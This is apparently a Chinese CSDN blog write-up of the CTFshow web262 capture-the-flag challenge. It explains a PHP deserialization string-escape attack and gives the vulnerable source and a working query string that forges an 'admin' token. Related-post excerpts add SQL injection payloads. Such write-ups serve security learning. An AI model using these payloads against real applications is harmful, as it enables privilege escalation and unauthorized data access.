CTFshow 反序列化入门 web262

最新推荐文章于 2024-09-10 15:14:28 发布
最新推荐文章于 2024-09-10 15:14:28 发布
阅读量245 收藏
点赞数 3
分类专栏: CTF 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46099552/article/details/141953409
版权

CTFshow 反序列化入门 web262
考点是:字符串逃逸

出现$umsg = str_replace('fuck', 'loveU', serialize($msg)); ,替换字符后是增长,增长逃逸


/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);

复制到本地调试,echo输出,test是自己输入的字符,发现token是user,应该是要修改user为admin

O:7:"message":4:{s:4:"from";s:4:"test";s:3:"msg";s:4:"test";s:2:"to";s:4:"test";s:5:"token";s:4:"user";}

需要构建的代码 ";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";} 长度为 47

所以需要输入47个fuck +";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";} (长度为235)

然后经过str_replace('fuck', 'loveU', serialize($msg); 后,fuck替换为loveU ,前面fuck的长度就变成了235,而多出来的";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";} 就会被顶到后面作为序列化对象执行

# 最后的 ";s:2:"to";s:4:"test";s:5:"token";s:4:"user";} 会被 ";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";} 顶掉
O:7:"message":4:{s:4:"from";s:4:"test";s:3:"msg";s:235:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";}";s:2:"to";s:4:"test";s:5:"token";s:4:"user";}

构建url

f=test&m=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";}&t=test

在浏览器输入后显示Your message has been sent ,发现没有flag回显,但是在头部的注释里面发现有一个message.php,访问发现flag就在下面

Sunset-_
关注
专栏目录
CTFshow 反序列化 web262
Kradress的博客
12-20 2636
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 # @message.php # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporti
[ctfshow]web入门——反序列化web261+web264-web267)
ShenZ的博客
03-02 6250
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
反序列化逃逸学习-CTFSHOW-web262
weixin_45931722的博客
10-14 377
首先进入看代码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 # @message.php # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0);
通过ctfshow web入门262——初时反序列化逃逸
qq_45766062的博客
09-13 883
ctfshow web入门262 1.分析题目: 这道题目是一道反序列化逃逸问题: $umsg = str_replace('fuck', 'loveU', serialize($msg)); 可以看到在注释中有一个message.php的文件,这里我们我们访问: 我们发现需要修改token为admin,并且传递的cookie要以base64编码。 字符逃逸的原理: (1)当正常传入参数时: <?php class message{ public $from; public $
CTFshow(web2-4)
weixin_51706044的博客
05-30 338
文章目录web02web03 web02 进入可以看到表单,很明显这是POST注入,可以利用万能密码进行登录 测试: 登陆成功 回显查看 1' or 1=1 union select 1,2,3# 进行数据库的查询 1'or 1=1 union select 1,database(),3# 查询表 1' or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema='web2'# 查
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 1679
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
CTFshow 反序列化 web257
Kradress的博客
12-19 1881
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 20:33:07 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
CTFshow 反序列化 web267
Kradress的博客
02-11 1186
目录思路题解总结 思路 进去是一个网页,在login页面试了下密码,发现是admin:admin,成功登录,但发现没什么改变 一个个页面查看源代码,最后再about页面中发现提示 访问?r=site%2Fabout&view-source拿到提示 ///backdoor/shell unserialize(base64_decode($_GET['code'])) 刚开始不知道怎么去用,后面想到%2F就是/,尝试了下r=/backdoor/shell,提示要加上参数,然后思路又断了,应该是信
CTFshow 反序列化 web255
Kradress的博客
12-19 590
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
CTFshow 反序列化 web264
Kradress的博客
02-11 1206
目录源码思路题解总结 源码 index.php <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 | # @message.php
Web反序列化 262~263详解
读书 买花 长大
11-19 1209
262~263
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 2912
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
ctfshow web入门 反序列化 263
m0_64815693的博客
04-08 1724
ctfshow web入门 反序列化 263
CTFshow 反序列化
starttv的博客
12-09 783
​Session​一般称为“会话控制“,简单来说就是是一种客户与网站/服务器更为安全的对话方式。一旦开启了session​ 会话,便可以在网站的任何页面使用或保持这个会话,从而让访问者与网站之间建立了一种“对话”机制。不同语言的会话机制可能有所不同,这里仅讨论​机制。​​可以看做是一个特殊的变量,且该变量是用于存储关于用户会话的信息,或者更改用户会话的设置,需要注意的是,​ 变量存储单一用户的信息,并且对于应用程序中的所有页面都是可用的,且其对应的具体session​ 值会存储于服务器端,这也是与。
CTFShow web入门刷题记录-爆破
打酱油的杯具的博客
11-29 2316
CTFShow web入门刷题记录-爆破 web21 先下载提供的密码包,查看hint得知考点为tomcat 账号提示为amdin,点击提交并使用burpsuit抓包 发现底下为一串经过base64编码的文字,翻译后得知为admin: 得知提交格式为:账号:密码 传入intruder,选中并添加$ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xsSzs95u-1606660930041)(C:/Users/%E8%83%A1%E5%A5%87/AppData/Roami
ctfshow web入门 反序列化
Sentiment的博客
12-26 1903
web254
CTFshow-WEB入门-反序列化
feng的博客
02-14 5566
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
ctfshow反序列化
njh18790816639的博客
04-18 1128
payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情 exp (Exploit )漏洞利用,一般是个demo程序 poc(Proof of Concept)漏洞证明,一般就是个样本 用来证明和复现 vul:(Vulnerability) :漏洞 Pwn:是一个
Android - NDK:在Jni中打印Log信息
最新发布
dami_lixm的专栏
09-10 311
在Jni中打印Log信息 1、在配置CMakeLists.txt find_library( # Sets the name of the path variable. log-lib # Specifies the name of the NDK library that # you want CMake to locate. log) # Specifies libraries CMake should link to your targ
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值